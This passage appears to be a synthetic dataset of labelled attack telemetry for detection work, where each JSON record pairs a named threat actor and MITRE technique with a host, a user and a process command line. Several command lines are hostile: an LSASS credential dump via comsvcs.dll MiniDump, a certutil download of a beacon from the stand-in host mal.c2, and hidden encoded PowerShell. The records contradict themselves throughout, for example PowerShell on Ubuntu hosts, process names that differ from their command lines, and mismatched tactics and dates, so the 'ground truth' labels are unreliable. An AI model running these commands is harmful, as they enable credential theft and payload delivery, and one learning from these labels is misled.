full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-12T01:50:31.000Z","user":{"name":"CORP\\s7tgixz2zaxa","sid":"S-1-5-21-467934796-665002028-2381"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260923T181902000Z_0012649","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.236.201.88","name":"AZURE-VM-3WQS8SH418","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12649Scattered SpiderT1021.006"},"network":{"domain":"github.com","dst_ip":"1.22.147.177","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-05T08:44:49.000Z","user":{"name":"CORP\\64hsgweuglkg","sid":"S-1-5-21-291645342-689256943-7964"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260520T064605000Z_0012651","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.91.36.113","name":"EC2-INST-W07UCHTJQC","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12651FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.58.161.118","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-12-15T12:53:21.000Z","user":{"name":"azuread\\cimwmrcv2khm","sid":"S-1-5-21-759185734-548815368-7051"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Discovery"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20250130T234535000Z_0012653","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.211.192.237","name":"WIN-FIN-SRV-GRAGJ5MMFS","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12653Scattered SpiderT1570"},"network":{"domain":"github.com","dst_ip":"1.82.179.207","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-11T12:13:38.000Z","user":{"name":"i-m52vw2j6fd10","sid":"S-1-5-21-359339898-763329158-7622"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Execution"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260904T183945000Z_0012655","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.11.9.50","name":"IAM-ROLE-YECLXN0MJC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12655UNC4841T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.182.220.33","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-21T18:10:21.000Z","user":{"name":"svc_vhnb142lj3oe","sid":"S-1-5-21-870083145-326372911-7673"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Exfiltration","Execution"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20261015T151315000Z_0012657","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.206.36.10","name":"EC2-INST-6T4M2G07WR","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12657FIN7T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.164.104.2","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1190 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-09-15T23:25:18.000Z","user":{"name":"CORP\\0vgbuuuu5gto","sid":"S-1-5-21-425312357-760216443-9129"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Discovery","Impact","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260608T214932000Z_0012659","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.108.156.170","name":"DB-ORACLE-5KKIM4ABQU","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12659Scattered SpiderT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.129.194.50","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-20T01:04:10.000Z","user":{"name":"CORP\\phjfz9kjzmil","sid":"S-1-5-21-222561996-245113069-9990"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Execution"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250121T163727000Z_0012661","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.250.190.176","name":"AZURE-VM-EEFMQSGGZR","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12661FIN7T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.15.76.122","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1683 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-01-25T23:38:00.000Z","user":{"name":"azuread\\m16a1ib2zdmp","sid":"S-1-5-21-963920650-185877606-7367"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20260806T183612000Z_0012663","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.195.251.142","name":"AZURE-VM-ASSSG4Q2BI","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12663APT41T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.173.25.81","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-18T21:17:07.000Z","user":{"name":"CORP\\cmi5uu0az497","sid":"S-1-5-21-258431650-626603673-4021"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access","Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260801T213614000Z_0012665","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.248.190.40","name":"APP-WEB-GCDWU4E2FO","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12665Scattered SpiderT1484.001"},"network":{"domain":"github.com","dst_ip":"1.79.139.22","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2571 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-14T22:18:18.000Z","user":{"name":"i-itmxorgbbbyr","sid":"S-1-5-21-868055255-311545342-3141"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Persistence"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20250515T064150000Z_0012667","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.95.10.27","name":"APP-WEB-NYZMP9TTEN","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12667FIN7T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.109.79.56","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-14T07:26:25.000Z","user":{"name":"CORP\\ly4vt5y7dhm0","sid":"S-1-5-21-914058750-520805807-5300"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Command and Control","Execution"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20251225T134023000Z_0012669","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.56.43.240","name":"APP-WEB-JQGUZ9Z43C","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12669APT29T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.171.94.82","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2679 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-07T15:55:20.000Z","user":{"name":"svc_eiczh2mr67b7","sid":"S-1-5-21-858818535-537480253-9557"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration","Command and Control","Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20250125T210734000Z_0012671","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.55.114.89","name":"IAM-ROLE-DFYZJ4P4CK","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12671Scattered SpiderT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.139.99.250","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-25T19:09:11.000Z","user":{"name":"CORP\\mqba5bqmubyc","sid":"S-1-5-21-105791553-609808768-7123"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Impact"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20251126T063306000Z_0012673","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.247.101.219","name":"AZURE-VM-MOF7ZGV4PW","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12673APT29T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.177.226.176","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-28T09:59:26.000Z","user":{"name":"CORP\\kt5j5tp1z7bn","sid":"S-1-5-21-582571611-422473568-2963"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250104T061420000Z_0012675","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.120.173.71","name":"DB-ORACLE-YA9CFQLMS6","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12675UNC4841T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.35.173.74","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-27T21:42:43.000Z","user":{"name":"i-1upfhnnk4cmf","sid":"S-1-5-21-266610171-573689171-8041"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Lateral Movement","Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20250507T203547000Z_0012677","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.10.14.166","name":"IAM-ROLE-L7ZTKI2DCA","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12677Volt TyphoonT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.183.127.18","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-06-05T17:34:26.000Z","user":{"name":"azuread\\81myd6t5ig4w","sid":"S-1-5-21-203039457-970630736-5841"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Discovery","Persistence"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20250329T084002000Z_0012679","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.33.0.101","name":"IAM-ROLE-L8WPQJ1T0L","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12679FIN7T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.117.203.206","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-08-01T08:51:22.000Z","user":{"name":"svc_7f3eedsain3f","sid":"S-1-5-21-203758507-967743260-6429"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement","Command and Control","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20260706T024230000Z_0012681","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.179.188.97","name":"EC2-INST-IM8DBAX5PU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12681Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.77.9.53","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3570 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-11-01T15:11:11.000Z","user":{"name":"arn:aws:iam::nqxctxmy9jlt","sid":"S-1-5-21-463986708-942411307-4232"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260322T125303000Z_0012683","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.144.6.193","name":"IAM-ROLE-9WQ5K7CJXN","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12683Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.167.20.247","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-21T22:31:49.000Z","user":{"name":"i-ppqmpa5utbnl","sid":"S-1-5-21-791707349-820019717-8047"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Persistence"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20260602T145424000Z_0012685","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.148.209.151","name":"AZURE-VM-TQDNHTD5XD","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12685FIN7T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.109.170.19","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-21T08:54:32.000Z","user":{"name":"arn:aws:iam::6fvkt31zq06i","sid":"S-1-5-21-763036507-426869621-4832"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250228T170956000Z_0012687","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.36.70.70","name":"EC2-INST-3HZCUQW9OR","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12687Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.109.194.240","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-09T01:41:02.000Z","user":{"name":"azuread\\enj52ac6batz","sid":"S-1-5-21-926754645-102689433-4890"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Persistence"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20260414T073121000Z_0012689","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.17.106.83","name":"APP-WEB-RTLJLFCG1T","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12689Lapsus$T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.2.184.14","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-04T05:23:46.000Z","user":{"name":"svc_0agodx2qzait","sid":"S-1-5-21-511110393-393606064-1137"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Initial Access","Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260301T133533000Z_0012691","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.179.180.137","name":"EC2-INST-RSWNSZX3U0","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12691FIN7T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.156.169.137","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3716 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-01T12:09:20.000Z","user":{"name":"arn:aws:iam::nrqi4vrw1tl6","sid":"S-1-5-21-996323460-339544823-8872"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Execution","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260831T123944000Z_0012693","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.76.149.233","name":"IAM-ROLE-FWOQ2FCRJ0","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12693Lapsus$T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.69.81.124","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-12-12T16:24:08.000Z","user":{"name":"i-uq66flheuhxg","sid":"S-1-5-21-101097652-323529046-2531"}} |
